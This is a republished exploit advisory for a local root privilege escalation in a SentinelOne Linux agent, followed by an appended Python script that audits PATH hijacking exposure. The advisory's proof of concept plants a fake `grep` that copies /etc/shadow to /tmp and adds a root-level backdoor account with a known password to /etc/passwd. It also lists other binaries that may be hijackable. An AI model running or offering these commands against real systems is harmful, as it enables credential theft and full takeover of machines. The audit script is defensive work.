SentinelOne sentinelagent 22.3.2.5 Privilege Escalation

2022.12.07
Risk: Medium
Local: Yes
Remote: No
CVE: N/A

Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability
Date: 12/06/2022
Exploit Author: ouch_this_hurts
Vendor Homepage: https://www.sentinelone.com/
Software Link: https://assets.sentinelone.com/prod/s1-linux-agent-datas
Version: 22.3.2.5
Tested on: Ubuntu 22.04.x
CVE: NA

Not enough AI in the world can help you write secure software, it seems? The vendor doesn't make reporting vulnerabilities easy, so to exploit-db it goes :)

Protips:

- If I Google you, and I cannot find an easy way to report the vulnerability, I'm not going to bother.
- If you require me to use HackerOne, I'm not going to bother.
- If you don't have a security.txt, how do you expect me to contact you?

Get `root` on a system with `sentinelagent<=22.3.2.5` with one simple trick: override `grep` in the `PATH` with your malicious code. Reboot. pwnd. Nice!

PoC below:

1. Find the system's "earliest" `PATH` entry, or just override `PATH` to whatever you want in `/etc/environment` with some other staged exploit.
2. Create the following `grep` file in that directory and make sure it's executable:

```shell
cat << SENTINELOOPS > /usr/local/bin/grep
#!/bin/bash
# I think I'll have the passwds pl0x
cat /etc/shadow > /tmp/etc_shadow
# password is password :)
echo 'sentinel_oops:\$1\$user1\$WuzQ29wbcMN09VLW7X0/q1:0:0::/root:/bin/sh' >> /etc/passwd
SENTINELOOPS
chmod +x /usr/local/bin/grep
```

3. Wait for the machine to reboot, then log in as `sentinel_oops:password` :)

```
$ su sentinel_oops
Password:
# whoami
root
```

What actually happened here? On `sentinelagent` start it runs `sh -c "grep...."`. So there are potentially other ways of privilege escalation via this "agent"?

- `grep` as demonstrated above
- `pgrep` examining the binary appears to be vulnerable
- `xargs` examining the binary appears to be vulnerable
- `cat` examining the binary appears to be vulnerable
- `ldd` examining the binary appears to be vulnerable
- `lsmod` examining the binary appears to be vulnerable
- `mksh` examining the binary appears to be vulnerable
- `awk` examining the binary appears to be vulnerable

[CWE-427](https://cwe.mitre.org/data/definitions/427.html) and [how to write secure software](https://youtu.be/RfiQYRn7fBg?t=16)
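The root cause above is CWE-427: a privileged service spawning `sh -c "grep ..."` lets the shell's `PATH` lookup decide which `grep` runs. The following audit script is an added example for defenders and is not part of the advisory or of any SentinelOne code. For each utility name the advisory lists, it reports which `PATH` directory wins the lookup (as `sh` would resolve it) and whether any directory searched before the expected location is writable by a non-root user, which is the condition that makes planting a shadowing binary possible. `EXPECTED_LOCATIONS` is an assumption for a stock Debian/Ubuntu merged-`/usr` layout; `SAMPLE_PATH` and `SAMPLE_DIRS` are a constructed filesystem view mirroring the PoC.

```python
#!/usr/bin/env python3
"""Audit PATH for search-path hijacking exposure (CWE-427).

Added example, not code from the advisory or from the vendor. The utility
names are the ones the advisory lists; EXPECTED_LOCATIONS is an assumption
for a Debian/Ubuntu merged-/usr layout and should be adjusted per distro.
"""
import os
import stat
from dataclasses import dataclass

WATCHED_UTILITIES = ["grep", "pgrep", "xargs", "cat", "ldd", "lsmod", "mksh", "awk"]

# Assumed canonical locations (Debian/Ubuntu); lsmod ships in /usr/sbin.
EXPECTED_LOCATIONS = {name: "/usr/bin" for name in WATCHED_UTILITIES}
EXPECTED_LOCATIONS["lsmod"] = "/usr/sbin"


@dataclass
class DirInfo:
    """What the audit needs to know about one PATH entry."""
    owner_uid: int
    mode: int            # st_mode bits of the directory
    binaries: frozenset  # executable names present in the directory


def unsafe_reason(directory, info):
    """Return why a PATH entry is a hijack point, or None if it looks safe."""
    if not directory or not directory.startswith("/"):
        return "relative PATH entry (resolves against the service's cwd)"
    if info is None:
        return None  # directory absent: nothing to shadow from there yet
    if info.owner_uid != 0:
        return f"owned by uid {info.owner_uid}, not root"
    if info.mode & stat.S_IWOTH:
        return "world-writable"
    if info.mode & stat.S_IWGRP:
        return "group-writable"
    return None


def resolve(path_dirs, dirs, name):
    """First PATH directory containing `name`, the way sh picks it."""
    for d in path_dirs:
        info = dirs.get(d)
        if info is not None and name in info.binaries:
            return d
    return None


def audit(path_value, dirs, expected=EXPECTED_LOCATIONS):
    """Return (utility, directory, reason) findings for a PATH and a filesystem view."""
    path_dirs = path_value.split(":")
    findings = []
    for name in WATCHED_UTILITIES:
        wanted = expected[name]
        chosen = resolve(path_dirs, dirs, name)
        if chosen is not None and chosen != wanted:
            findings.append((name, chosen, f"shadows {wanted}/{name}"))
        # Every directory searched before the expected one is a hijack point
        # if someone other than root can write to it.
        for d in path_dirs:
            if d == wanted:
                break
            reason = unsafe_reason(d, dirs.get(d))
            if reason:
                findings.append((name, d, reason))
    return findings


def snapshot(path_value):
    """Build the filesystem view from the live system (for real use)."""
    dirs = {}
    for d in path_value.split(":"):
        try:
            st = os.stat(d)
            names = frozenset(
                f for f in os.listdir(d) if os.access(os.path.join(d, f), os.X_OK)
            )
        except OSError:
            continue
        dirs[d] = DirInfo(st.st_uid, st.st_mode, names)
    return dirs


# Constructed view mirroring the PoC: a planted `grep` in /usr/local/bin,
# which Ubuntu's default PATH searches before /usr/bin.
SAMPLE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
SAMPLE_DIRS = {
    "/usr/local/sbin": DirInfo(0, 0o40755, frozenset()),
    "/usr/local/bin": DirInfo(0, 0o40755, frozenset({"grep"})),
    "/usr/sbin": DirInfo(0, 0o40755, frozenset({"lsmod"})),
    "/usr/bin": DirInfo(0, 0o40755, frozenset(WATCHED_UTILITIES)),
    "/sbin": DirInfo(0, 0o40755, frozenset()),
    "/bin": DirInfo(0, 0o40755, frozenset()),
}

if __name__ == "__main__":
    live_path = os.environ.get("PATH", "")
    for utility, directory, reason in audit(live_path, snapshot(live_path)):
        print(f"{utility}: {directory}: {reason}")
```

Run against the constructed view, the only finding is `grep` resolving in `/usr/local/bin` ahead of `/usr/bin/grep`. Run live, the script should be given the `PATH` the service actually starts with (from its unit file or `/proc/<pid>/environ`), not the auditor's interactive shell's, since that is the one the `sh -c` lookup uses.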


Copyright 2023, cxsecurity.com